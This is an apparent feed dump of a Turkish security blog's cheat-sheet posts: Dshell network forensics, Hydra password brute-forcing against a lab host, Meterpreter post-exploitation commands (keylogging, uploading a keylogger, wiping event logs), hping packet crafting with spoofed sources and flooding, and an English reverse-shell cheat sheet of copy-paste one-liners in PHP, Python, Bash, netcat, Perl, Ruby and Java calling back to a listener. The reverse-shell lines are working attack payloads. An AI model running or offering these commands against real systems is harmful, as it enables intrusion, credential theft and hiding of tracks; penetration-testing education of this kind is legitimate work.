cheatsheet arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me cypm! Thu, 19 Apr 2018 19:49:27 +0000 tr hourly 1 https://wordpress.org/?v=6.0 https://canyoupwn.me/wp-content/uploads/2016/02/cropped-Başlıksız-1-32x32.png cheatsheet arşivleri • CanYouPwnMe! - For Cyber Security Researchers https://canyoupwn.me 32 32 TR | Dshell Forensic Framework ile Network Paketi Analizi https://canyoupwn.me/dshell-forensic-framework-ile-network-paketi-analizi/ https://canyoupwn.me/dshell-forensic-framework-ile-network-paketi-analizi/#respond Thu, 14 Apr 2016 06:30:06 +0000 https://canyoupwn.me/?p=1524 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Dshell Nedir Dshell, bir ağ adli analizi yapmayı sağlayan uygulama çatısıdır. Ağ paketlerini yakalayıp onların incelenmesi için kullanılmaktadır. Bu analiz esnasında kullanılabilecek farklı eklentileri desteklemektedir. Bu sayede genişletilebilir bir yapısı vardır. US Army Research Lab tarafından Python dili kullanılarak geliştirilmiştir. Dshell Forensic Framework’e aşağıdaki Github linkinden erişilebilir. https://github.com/USArmyResearchLab/Dshell Gereksinimler ve Kurulum Dshell Forensic Framework aşağıdakilere […]

TR | Dshell Forensic Framework ile Network Paketi Analizi CanYouPwnMe

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Dshell Nedir

Dshell, bir ağ adli analizi yapmayı sağlayan uygulama çatısıdır. Ağ paketlerini yakalayıp onların incelenmesi için kullanılmaktadır. Bu analiz esnasında kullanılabilecek farklı eklentileri desteklemektedir. Bu sayede genişletilebilir bir yapısı vardır. US Army Research Lab tarafından Python dili kullanılarak geliştirilmiştir. Dshell Forensic Framework’e aşağıdaki Github linkinden erişilebilir.

https://github.com/USArmyResearchLab/Dshell

Gereksinimler ve Kurulum

Dshell Forensic Framework aşağıdakilere gereksinim duymaktadır:

  • Linux (Ubuntu 12.04 üzerinde geliştirilmiştir)
  • Python 2.7
  • pygeoip (GNU Lesser GPL, MaxMind GeoIP Legacy datasets)
  • PyCrypto (Custom License)
  • dpkt (New BSD License)
  • IPy (BSD 2-Clause License)
  • pypcap (New BSD License)
  • elasticsearch-py (Apache License, Version 2.0 – Elasticout çıktısı almak için kullanılır, kurulumu isteğe bağlı)

Gereksinim duyduğu paketleri aşağıdaki komut ile kurabilirsiniz:

sudo apt-get install python-pypcap python-ipy python-dpkt python-crypto
sudo pip install pygeoip elasticsearch

Github üzerinden Dshell aşağıdaki gibi clonlanır ve kurulur:

git clone https://github.com/USArmyResearchLab/Dshell.git
cd Dshell
python install-ubuntu.py

 

Kurulumda yapılması gereken bir işlem de pygeoip modülünün yapılandırılmasıdır. Bunun için MaxMind dosyalarının (GeoIP.dat, GeoIPv6.dat, GeoIPASNum.dat, GeoIPASNumv6.dat) yani coğrafi konum dosyalarının uygulamanın kurulu olduğu konumda bulunan /share/GeoIP/ (<kurulum-dizini>/share/GeoIP/) dizinine yerleştirilmelidir.

Son olarak aşağıdaki komut ile Dshell başlatılır.

./dshell

Basit Kullanım

decode -h

Kullanılabilir özellikler için yardım listesini gösterir.

decode -l

Kullanılabilir decoderleri özet bilgi vererek listeler.

decode -d <decoder>

Bir decoder hakkında bilgi verir.

decode -d <decoder> <pcap>

Seçilen decoderi belirtilen pcap dosyası için uygular.

Kullanılabilir decoderlerin listesi aşağıdaki gibidir:

decode -l

dshell modules

Örnekler

Bu örneklerde kullanılan pcap (ağ trafiği) dosyalarına aşağıdaki bağlantıdan ulaşabilirsiniz:

https://wiki.wireshark.org/SampleCaptures#General_.2F_Unsorted
  • Bir pcap dosyası içerisinde geçen DNS sorgularını görmek için dns modülü kullanılır. Örneğin aşağıdaki gibi bir çıktı elde edilir:

dshell dns

  • Bir network akışını reassemble edilmiş halde görmek için kullanılabilecek modül followstream modülüdür. Bu modüle ait örnek ekran görüntüsü aşağıdaki gibidir:

dshell followstream

  • HTTP oturumları hakkında bilgi almak için de kullanılabilecek olan modül httpdump modülüdür. Bu modüle ait örnek ekran görüntüsü de aşağıdaki gibidir:

dshell httpdump

Dshell Forensic Framework ile ayrıca ağ trafiğinde indirilmiş herhangi bir flash dosyasının tespit edilmesi, cryptolocker türevi bir uygulama tespiti, 5 dakikadan uzun süren bağlantılar veya 1MB’tan büyük veri transferi olan akışlar gibi bir çok farklı analiz işlemi gerçekleştirilebilir. Tüm bu özelliklere yukarıda da gösterilen modül listesinden erişilebilir. İhtiyaca uygun olanı kullanarak analizinizi gerçekleştirebilirsiniz. İsterseniz kendi modülünüzü yazıp Dshell’e entegre ederek kullanabilirsiniz.

TR | Dshell Forensic Framework ile Network Paketi Analizi CanYouPwnMe

]]>
https://canyoupwn.me/dshell-forensic-framework-ile-network-paketi-analizi/feed/ 0
TR | Hydra Cheat Sheet https://canyoupwn.me/hydra-cheat-sheet/ https://canyoupwn.me/hydra-cheat-sheet/#respond Mon, 04 Apr 2016 12:00:45 +0000 https://canyoupwn.me/?p=1403 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Hydrayı kısaca tanımlayacak olursak bruteforce yapan bir şifre kırma aracıdır. Oldukça çok tercih edilmektedir. Bunun sebebi bir çok protokolü (Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, […]

TR | Hydra Cheat Sheet CanYouPwnMe

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Hydrayı kısaca tanımlayacak olursak bruteforce yapan bir şifre kırma aracıdır. Oldukça çok tercih edilmektedir. Bunun sebebi bir çok protokolü (Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. ) desteklemesidir. Sözlük saldırısı yaparken kullanılır.

GUI arayüzü olmasına rağmen çoğunlukla terminalden kullanılır. Bunun nedeni ise daha stabil çalışmasıdır.

GUI görünümü

Hydra'nın Gui Görüntüsü

Windows, OS/X ve tüm Unix sistemlerde çalışmaktadır.

Terminalde genel kullanımı ise;

hydra [some command line options] PROTOCOL://TARGET:PORT/OPTIONS

şeklindedir. Daha detaylı syntax ise;

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]][-w TIME] [-f] [-s PORT] [-S] [-vV]server service [OPT]

 

şeklindedir.

Hydra’nın parametrelerinden bahsedelim.

  • -l   Bu parametreden sonra kullanıcı adını elle girmemiz gerekir.
    hydra -l cypm
  •  Bu parametre ile kullanıcı adlarının olduğu dosyanın yolunu göstererek kullanıcı adı girişini sağlarız.
    hydra -L /home/Desktop
  •  Adım adım denenen her şifreyi ve aldığınız cevabın terminalden kaymasını sağlar.
    hydra -V
  •  Parola bulunduktan sonra atak yapmayı bırakır ve size parolanın ne olduğunu gösterir.
    hydra -f
  •  Bu parametre ile parolalarımızın bulunduğu (sözlük saldırısı için) dosyanın yolunu gösteririz.
    hydra -P /home/Desktop/passlist.txt
  •   Aynı anda çalıştırabileceği bağlantı sayısını veriyoruz.(5 örnektir)
    hydra -t 5
  •   Bu parametreyi yazdığımızda en_az_karater_uzunluğu:en_fazla_karakter_uzunluğu:charset(5:5:ISO-8859-8 örnektir)
    hydra -x 5:5:ISO-8859-&lt;wbr /&gt;8

Şeklinde yazmamız gerekiyor. Yani ilk yere en az kaç karakter olması gerektiği, ikinciye en fazla ne kadar olabileceği, üçüncüye ise parolada nelerin olabileceği yazılır. Üçüncüyü şöyle anlatalım özel karakterlerden birimi olacak */-+%&] sayı mı olacak 1232435 gibi yoksa harf mi olacak bunu yazıyoruz. Bu parametreyi yazdıktan sonra kendisi otomatik olarak parolaları deniyor.

  •   Parametresini kullanarak aynı anda hem kullanıcı adı hemde parola girebiliriz. Bunu yapabilmemiz için sözlüğümüzde kullanıcı adı ve parolalar kolon halinde yani kullanici_adi:sifre şeklinde kaydedilmiş olmalılar.
    hydra -C kullanici_adi:sifre
  •   Parametresinin kullanımı diğerlerinden biraz daha farklı. Örneğin boş parola olan bir ftp sunucusuna saldırırken –e parametresini kullanırız ve e parametresinin arkasına da s,n,r girişlerinde bulunuruz. Bunların ne işe yaradığını yazalım. S yazarsak parola ile giriş yap, N yazarsak boş parola ile giriş yap, r parola ile kullanıcı adını yer değiştirerek giriş yap demiş oluruz.
    hydra -e
  •  Servis normalde olandan farklı bir port kullanıyorsa bu parametrenin arkasına portu yazabiliriz.
    hydra -s 80
  •   Eğer ki IPv6 kullanılıyorsa -6 ekledikten sonra köşeli parantezin için ip eklememiz gerekir.
    hydra -6 [2a01:24a:133:0:00:123:ff:1a]
  •   Bir önceki oturumu geri yükler.
    hydra -R
  •   Parametresi ile elimize xml txt gibi bir çıktı alabiliriz.
    hydra -o
  •   Dönen cevabı bekleme süresi. Saniye cinsinden.
    hydra -w

Şimdi örneklere geçelim.

pass.txt ile

Burada

hydra –l root –V –P pass.txt ssh://192.168.245.137

komutunu verdik. Sırayla neler olduklarından bahsedelim.

  • -l parametresi ile kullanıcı adımızı giriyoruz.
  • -V parametresi ile yapılan işlemleri görmemizi sağlıyoruz.

-P pass.txt dosyamızı verdik. İçinde parolalar bulunuyor.

Ssh ile kırmak istediğimiz bağlantıyı vermiş oluyoruz.

192.168.245.137 ile de bağlanacağımız yeri belirtiyoruz.

Bu işlemler bitince bize root kullanıcı adımızın parolasının 1234 olduğunu gösteriyor.

dosyaya yazarak

Hydra –l msfadmin –o ~/ilk.xml –P pass.txt a href="ftp://192.168.245.137" ftp://192.168.245.137

 

Bu komutu açıklayalım.

  • -l ile tekrar kullanıcı adımızı belirttik. Bunun yerine bir txt içine msfadmin yazıp koyabilirdik ve –L parametresini kullanarak kullanici_adi.txt diye kaydedip gösterebilirdik.
  • -o parametresi ile yapılan işlemleri xml olarak kaydediyoruz.
  • -P parolalarımızın bulunduğu txt yi gösteriyoruz.

ftp ile bağlantımızı seçiyoruz.

192.168.245.137 ile bağlanacağımız adresi gösteriyoruz.

-x parametresi ile

Hydra –l root –V –x 1:4:1 ssh://192.168.245.137
  • -l ile kullanıcı adımızı verdik.
  • -V ile yapılan işlemleri görelim.
  • -x kullanarak kendisine bruteforce yaptırıyoruz. Değişkenleri açıklayalım 1:4:1 syntaxında belirttiğimiz şey parola 1 ile 4 karakter arasında olacak ve sayı olacak. Burada bunu belirtmiş oluyoruz.

Ssh bağlantı tipimizi tekrar seçmiş olduk.

192.168.245.137 ile bağlanacağımız hostu seçtik.

Not: Burada –f parametresini eklemeyi unutmuşum. İşlem bu şekilde çok uzun sürüyor.

Not: İşlem sanal makineden yapıldığı için uzun sürüyor, birkaç tane yaptıktan sonra komutu durdurdum.

e parametresi

 

Hydra –e s –L pass.txt ssh://192.168.245.137
  • -e ile farklı bir giriş deneyeceğimizi gösterdik ve s parametresini kullanarak parola denemesini söylüyoruz.
  • -L ile kullanıcı adını pass.txt den çekiyor.

herşey var

Burada ek olarak –f parametresini kullandık ve parolayı bulduğu anda işlem yapmayı bıraktı.

TR | Hydra Cheat Sheet CanYouPwnMe

]]>
https://canyoupwn.me/hydra-cheat-sheet/feed/ 0
TR | Meterpreter Cheat Sheet https://canyoupwn.me/tr-meterpreter-basit-komutlar/ https://canyoupwn.me/tr-meterpreter-basit-komutlar/#respond Fri, 12 Feb 2016 08:00:47 +0000 http://canyoupwn.me/?p=367 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Meterpreter Nedir ? Meterpreter metasploit ile exploit ettiğiniz bir açık ile terminal’e ulaştığınızda size bir terminal ekranı verir.( SSH’a benzetebilirsiniz. ) Bu meterpreter terminali ile bir çok işlem yapabilirsiniz.Aşağıda görüceğiniz gibi kurbanın sisteminde ( victim ) keylogger başlatabilirsiniz veya özel izinlere sahip kullanıcılar oluşturabilirsiniz.Meterpreter ile yapabiliceklerinizin bir sınırı yok gibi birşeydir.Linux bash terminale benzer ( […]

TR | Meterpreter Cheat Sheet Enes ERGÜN

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Meterpreter Nedir ?
Meterpreter metasploit ile exploit ettiğiniz bir açık ile terminal’e ulaştığınızda size bir terminal ekranı verir.( SSH’a benzetebilirsiniz. ) Bu meterpreter terminali ile bir çok işlem yapabilirsiniz.Aşağıda görüceğiniz gibi kurbanın sisteminde ( victim ) keylogger başlatabilirsiniz veya özel izinlere sahip kullanıcılar oluşturabilirsiniz.Meterpreter ile yapabiliceklerinizin bir sınırı yok gibi birşeydir.Linux bash terminale benzer ( komutlar vs. ).

Not:Aşağıda ki komutlarda sadece belli başlı komutlara örnek verildi.Genel işleyiş yine aynı şekildedir.

mtrprtr
Meterpreter Komutları :
Meterpreter’i kullanmak basittir.Aynı linux terminaline benzetebilirsiniz.Tek farkla bu terminal kurban kişide çalışmaktadır ve tabi ki bunu göremez.
Meterpreterde kullanılan komutların çoğu bash komutlarına benzer.Yine’de şöyle bir göz gezdirelim.
Meterpreter de kullanılan komutlar:
? – Yardım menüsü zaten buradan okuyarak da ilerleyebilirsiniz.
bgkill = Arkaplanda ki meterpreter komutlarını sonlandırır.
bglist = Arkaplanda çalışan meterpreter komutlarını listeler.
bgrun = Arkaplanda komut çalıştırmanızı sağlar.
channel = Aktif olarak bağlandığınız kanalları gösterir.
close = Kanalları kapatır.
exit & quit = Meterpreter sesssionı sonlandırır.
interact = kanallar ile etkileşime girer.
irb = Ruby script modunu açar.
read = Kanallarda ki dataları okur
run = Yazdığınız bir meterpreter scriptini çalıştırır.
use = Meterpreter eklentilerini load eder ( yükler )
write = Kanallara data yazar.
cat = Bash’de ki kullanımıyla aynıdır.Dosyayı okur ve ekrana basar.
cd = Bulunduğunuz konumu değiştirir. C:/windows C:/ vb.
del = Kurbanın dosya sisteminden dosya siler.
download = Kurbanın sisteminden kendi sisteminize dosya indirir.

download c:\\hesaplar.txt
### Burda çift slash kullanmamızın nedeni windows sistemlerde aslında bu şekilde olmasından kaynaklıdır.

edit = dosya editlemenize yarar. ( Vim’i açar )

edit editabletext.txt 

getlwd = Sistemin ana klasörünü gösterir. C:/Windows veya Linux / dizini gibi.
getwd = Şuan bulunduğunuz konumu,klasörü gösterir.
lcd = Sistemin ana klasörünü değiştirmenizi sağlar.
ls = Bulunduğunuz klasörün içinde ki dosyaları ve klasörleri görüntüler.
rm = Dosya silme işlemi yapar.

rm editable.txt 

rmdir = Klasör silme işlemi yapar

rmdir Windows// 

upload = Kurbana bir dosya göndermenize yarar.

 upload keyloggerimiz.exe C://Windows//System32 

ipconfig = Ağ aygıtlarını ve bununla birlikte IP vs. gösterir.
portfwd = Kurban dan port yönlendirmesi yapabilirsiniz.
route = Kurbanın yönlendirme tablosunu değiştirebilir ve görüntüleyebilirsiniz.
clearev = Kurbanın sistem günlüklerini temizlersiniz.

[*] Wiping 33 records from Application...
[*] Wiping 555 records from System...
[*] Wiping 38 records from Security...

execute = Komut çalıştırmak için kullanılır.
ps = Çalışan prosessleri görüntüleyebilirsiniz.
kill = Prosess id ile çalışan uygulamaları kapatabilirsiniz.
reboot = Kurbanın sistemine restart atar.
rev2self = Kurbanın sisteminde RevertToSelf()’i çalıştırır.
shell = Kurbanın bilgisayarında terminali açarsınız.
shutdown = Kurbanın sistemini kapatırsınız.
sysinfo = Kurbanın sistemi hakkında detaylı bilgi alırsınız.
enumdesktops = Ulaşılabilir tüm masaüstlerini görüntüler.
getdesktop = Kullandığınız meterpreter’de ki mevcut masaüstünü getirir. ( O an hangi kurban ile uğraşıyorsanız. )
screenshot = Kurbanın ekran görüntüsünü alırsınız.
uictl = Bazı kullanıcı arayüzü eklentilerini aktif hale getirirsiniz.( RDP vs)
keyscan_start = Uzakta ki hedefin,kurbanın tuşa bastıklarını kaydetmek için başlatılır.Keylogger gibi.
keyscan_dump = Uzakta ki hedefin,kurbanın tuş dökümlerini almanızı sağlar.
keyscan_stop = Keyscan modülünü deaktif eder.
getprivs = Kurbanın sisteminde bazı özel ayrıcalıkları alırsınız.
use sniffer = Sniffer modülünü load eder.
sniffer_interfaces = Kurbanın sisteminde ki uygun( sniff edilebilicek ) arayüzleri gösterir.
sniffer_dump arayüzID pcapname = Uzak hedefi sniff etme işlemini başlatır.
sniffer_start arayüzID packet-buffer = Sniffer’ı başlatır fakat sizin istediğiniz özel buffer aralıklarında.
sniffer_stats arayüzID = Sniff edilen ağa ait istatiksel bilgileri gösterir.
sniffer_stop arayüzID = Belli bir arayüzde başlatılan sniffer’ı durdurur.

TR | Meterpreter Cheat Sheet Enes ERGÜN

]]>
https://canyoupwn.me/tr-meterpreter-basit-komutlar/feed/ 0
TR | Hping Cheat Sheet https://canyoupwn.me/tr-hping-cheatsheet/ https://canyoupwn.me/tr-hping-cheatsheet/#respond Wed, 10 Feb 2016 13:39:27 +0000 https://www.canyoupwn.me/?p=441 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Hping, komut satırı tabanlı TCP/IP paketlerini oluşturmaya ve analiz etmeye yarayan, Salvatore Sanfilippo tarafından yayınlanan açık kaynak kodlu bir araçtır. Bu aracı http://www.hping.org/ adresinden indirebilir ve hakkında ayrıntılı bilgi edinebilirsiniz. Hping aracı, size istediğiniz özelliklerde TCP/IP paketleri üretmeniz konusunda yardımcı olmaktadır. Özel olarak ürettiğiniz bu paketler ile güvenlik denetimlerinde bulunabilirsiniz. Kullanım alanlarını sayacak olursak: Bilgisayar […]

TR | Hping Cheat Sheet CanYouPwnMe

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Hping, komut satırı tabanlı TCP/IP paketlerini oluşturmaya ve analiz etmeye yarayan, Salvatore Sanfilippo tarafından yayınlanan açık kaynak kodlu bir araçtır. Bu aracı http://www.hping.org/ adresinden indirebilir ve hakkında ayrıntılı bilgi edinebilirsiniz.

Hping aracı, size istediğiniz özelliklerde TCP/IP paketleri üretmeniz konusunda yardımcı olmaktadır. Özel olarak ürettiğiniz bu paketler ile güvenlik denetimlerinde bulunabilirsiniz. Kullanım alanlarını sayacak olursak:

  • Bilgisayar ağlarını keşif, gelişmiş port tarama özellikleri
  • Firewall tespit ve test işlemleri
  • Ağ dinleme modu
  • Dosya transferi
  • Komut çalıştırma özelliği
  • IDS/IPS sistemlerin keşfi

gibi alanlardır.

Çalışma mekanizmasına bakılacak olursa, hedef sisteme dair elde edilmek istenen bilgi doğrultusunda TCP/IP paketleri oluşturulur ve oluşturulan bu paketler hedef sisteme gönderilir. Hedef sistemin bu pakete göstermiş olduğu reaksiyon analiz edilir ve bu analiz sonucunda hedef sisteme dair bilgi veya bilgiler elde edilmiş olur. Bu mekanizma aşağıda gösterilen örnek ile açıklanmaya çalışılmıştır.

Bu örnekte hedef host olan 192.168.2.250 ip adresine sahip makinenin canlı olup olmadığı bilgisi elde edilmeye çalışılmaktadır. Bu bilginin elde edilebilmesi için bir adet sorgulama mesajına ihtiyaç duymaktayız. Aradığımız bu sorgu mesajı için ICMP protokolü bünyesinde bulunan echo request sorgu mesajını kullanabilir. Hedef sisteme ICMP protokolü ile echo request mesajı atılır  ve sistemin bize vereceği yanıt değerlendirilerek elde edilmeye çalışılan bilgi edinilebilir. Bu noktada hpinge ihtiyaç duyulmaktadır. Aşağıda verilen komut ile bu paket hazırlanır ve gönderilir.

1

Bu aşamada Komutla ilgili parametreler göz ardı edilmelidir. Önemli olan hazırlanan paket ile karşı sistemden bir reaksiyon almaktır ve bu reaksiyon sonucunda bilgiye ulaşmaktır. Aşağıda hedef sistemin göstermiş olduğu reaksiyon gözükmektedir.

2

Görüldüğü üzere hedef sistem gönderdiğimiz 4 numaralı pakete karşılık 5 numaralı ICMP echo reply ile cevap vermiştir. Bu mesaj yorumlandığında hedef sistemin canlı olduğu sonucuna ulaşılacaktır. Hping ile alakalı olarak gerçekleştirilebilecek tüm uygulamalar temel olarak yukarıda bahsedilen prensipler çerçevesinde cereyan etmektedir. Kısaca hedef sistem için paket hazırlanıp gonderilir ve gerceklesecek olan reaksiyon yorumlanır.

Hpingin kullanım şekli ise aşağıda gösterilmiştir.

Kullanımı: hping3 [host] [seçenekler]

Bu kullanımın yanı sıra yalnızca hping3 yazılarak hping aracının komut satırına düşülerek manuel olarak istenilen paketler hazırlanabilir. Bu konuya  sonraki yazılarda değinilecektir.

Hping aracını etkin bir şekilde kullanabilmek için programa gönderilecek olan parametrelere tam olarak hakim olmak gerekmektedir. Aşağıda bu parametreler niteliklerine göre bölümlere ayrılıp anlatılmaktadır.

– h     :   Yardım seçeneklerini görüntüle.

– c     :   Oluşturulup gönderilecek paket sayısı.

– i      :   Aralık, (-uX, X burada mikrosaniye (10^-6) cinsinden bir değerdir.)

Yukarıda gösterilen -i parametresini açıklayacak olursak;

hping3  173.194.40.211 -i u100000 denildiği zaman; bir paket hazırlanıp gönderilir ve gönderilecek diğer paket için 100000 µs süresince bekleme yapılır. Ardışık olarak gönderilen paketlerin her biri için bu aralık korunur.

— flood : Oluşturulabilecek en hızlı şekilde paketleri oluştur ve gönder.

– I       : Paketlerin yönlendirileceği ağ arayüzü

Yukarıdaki anlatılan parametreler aşağıdaki örnek ile gerçeklenmiş ve gösterilmiştir.

3

Yukarıda verilen komut ile 0.1 saniye aralıklarla 5 adet paket üretilmiştir ve wlan0 arayüzünden iletilmiştir. Aşağıdaki ekran görüntüsünde time sütununa bakıldığında bu durum gözükmektedir.4 numaralı paket referans alınarak time sekmesi altında belirttiğimiz zaman aralıkları ile paket iletildiğini görmekteyiz.

4

Hping için birçok çalışma modu mevcuttur.

– 0 — rawip  : Ham ip paketleri oluşturma. (IP+ETHERNET)

– 1 — icmp     : ICMP paketleri oluşturma. (ICMP + IP + ETHERNET)

– 2 — udp       : UDP paketleri oluşturma. (UDP + IP + ETHERNET)

– 8 — scan     : Tarama modu.

– 9 — listen   : Dinleme modu.

Yapılmak istenen işleme göre tarama modu seçilmelidir. Hping varsayılan olarak TCP modunda çalışmaktaktadır. Aşağıdaki örnekte bu parametreler gösterilmiştir.

5

Yukarıdaki komut ile hedef için UDP paketleri hazırlanıp gönderilmiştir.

Screenshot from 2013-12-28 22-38-24

Hping içerisindeki diğer bir bölüm ise IP protokolü için ayrılmıştır. Bu bölümde belirlenen parametrelerin tümü IP başlığı içerisindeki özel alanlardan oluşmaktadır. Bu parametrelerden birkaç tanesi aşağıda gösterilmiştir.

– a                        : Kaynak ip adresini belirle

— rand-source  : Rastgele kaynak ip belirle.

— rand-dest       : Rastgele hedef ip belirle.

– t –ttl                 : ttl değerini belirle.

– o –tos               : tos (type of service) alanını belirle.

– y  –dontfrag   : Don’t fragment alanını belirle.

Aşağıdaki örnekte bu parametrelerin kullanımı gösterilmektedir.

Ekran Alıntısı

Yukarıdaki komut ile kaynak adresleri spooflanmış, ttl değeri 25 olarak belirlenmiş ve dont fragment bayrağı set edilmiş 4 adet ip paketi hedefe gönderilmiştir. Bu paketler aşağıda gösterilmektedir.

6

Hping içerisindeki diğer bir bölüm ise ICMP paketlerinin oluşturulduğu bölümdür. Bu bölümde kullanılacak olan parametrelerin bir kısmı aşağıda gösterilmiştir.

– C  –icmptype : ICMP mesaj tipi (varsayılan echo request)

– K  –icmpcode : ICMP kodu. (Varsayılan 0)

— icmp-help       : Diğer tüm mesaj tipleri için parametreleri görüntüle.

Sonraki bolum ise TCP/UDP protokollerini hazırlamak için kullanılan parametrelerden oluşmaktadır. Bu bölüm ile istenilen özelliklerde TCP veya UDP segmentleri oluşturulabilmektedir. Aşağıda bu parametrelerin birkaç tanesi gösterilmiştir.

– s  — baseport                 : Kaynak port adresi.

– p  — destport                 : Hedef port adresi.

– F/S/R/P/A/U/X/Y     : TCP bayraklarını set etme özelliği.

– w  — win                         : Windows size alanını set et.

– M                                     : Sıra numarasını belirle.

– L                                      : Ack numarasını belirle.

Aşağıda gösterilen örnekte yukarıdaki parametreler kullanılarak istenilen özelliklerde TCP paketi oluşturulmuş ve gönderilmiştir.

7

Bu paketi aşağıda gösterilmektedir.

8

Son bölümde ise ethernet çerçevesine yönelik genel parametreler tanımlanmıştır.

 – d — data        : Pakete yerleştirilecek veri boyutu.

– E — file           : Dosyadan okunacak veri.

– T — traceroute : Traceroute modu.

– B  — safe        : Dosya transferi sırasında güvenli protokolleri kullan.

Bu yazıda hpingin ne olduğu, nasıl çalıştığı, parametrelerinin ne işe yaradığı nasıl kullanılacağı anlatılmıştır.

TR | Hping Cheat Sheet CanYouPwnMe

]]>
https://canyoupwn.me/tr-hping-cheatsheet/feed/ 0
EN | Reverse Shell Cheat Sheet https://canyoupwn.me/en-reverse-shell-cheat-sheet/ https://canyoupwn.me/en-reverse-shell-cheat-sheet/#respond Sun, 31 Jan 2016 20:28:54 +0000 http://canyoupwn.me/?p=147 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell. If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell […]

EN | Reverse Shell Cheat Sheet Hakkı YÜCE

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.
If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port.  This page deals with the former.

Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.

The examples shown are tailored to Unix-like systems.  Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”.
Each of the methods below is aimed to be a one-liner that you can copy/paste.  As such they’re quite short lines, but not very readable.

nclvp

The following examples 192.168.10.11 Local IP and the local port 4545 to listen


Php

php -r '$sock=fsockopen("192.168.10.11",4545);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4545));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash

bash -i &gt;&amp; /dev/tcp/192.168.10.11/4545 0&gt;&amp;1

Netcat

nc -e /bin/sh 192.168.10.11 4545

Perl

perl -e 'use Socket;$i="192.168.10.11";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh -i");};'

Ruby

ruby -rsocket -e'f=TCPSocket.open("192.168.10.11",4545).to_i;exec sprintf("/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d",f,f,f)'

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5&lt;&gt;/dev/tcp/192.168.10.11/4545;cat &lt;&amp;5 | while read line; do \$line 2&gt;&amp;5 &gt;&amp;5; done"] as String[])
p.waitFor()

EN | Reverse Shell Cheat Sheet Hakkı YÜCE

]]>
https://canyoupwn.me/en-reverse-shell-cheat-sheet/feed/ 0
TR | Reverse Shell Cheat Sheet https://canyoupwn.me/tr-reverse-shell-cheat-sheet-2/ https://canyoupwn.me/tr-reverse-shell-cheat-sheet-2/#respond Sun, 31 Jan 2016 20:28:43 +0000 http://canyoupwn.me/?p=53 CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Bir sızma testinde hedef makina üzerinde komut çalıştırabilecek bir zafiyet yakalamışsınızdır ancak SSH keyi eklemenize yada benzer bir şekilde bağlantı açmanıza imkan vermiyor olabilir… Bu durumda bir TCP porta reverse shell almak istersiniz. Komut çalıştırarak reverse shell almanıza imkan sağlayacak etken hedef makinada çalışan betik  dilleridir, en stabil şekillerini sizin için “kopyala/yapıştır” kullanabileceğiniz bir şablon […]

TR | Reverse Shell Cheat Sheet Hakkı YÜCE

]]>
CanYouPwnMe! - For Cyber Security Researchers CanYouPwnMe! - For Cyber Security Researchers - cypm!

Bir sızma testinde hedef makina üzerinde komut çalıştırabilecek bir zafiyet yakalamışsınızdır ancak SSH keyi eklemenize yada benzer bir şekilde bağlantı açmanıza imkan vermiyor olabilir…
Bu durumda bir TCP porta reverse shell almak istersiniz.

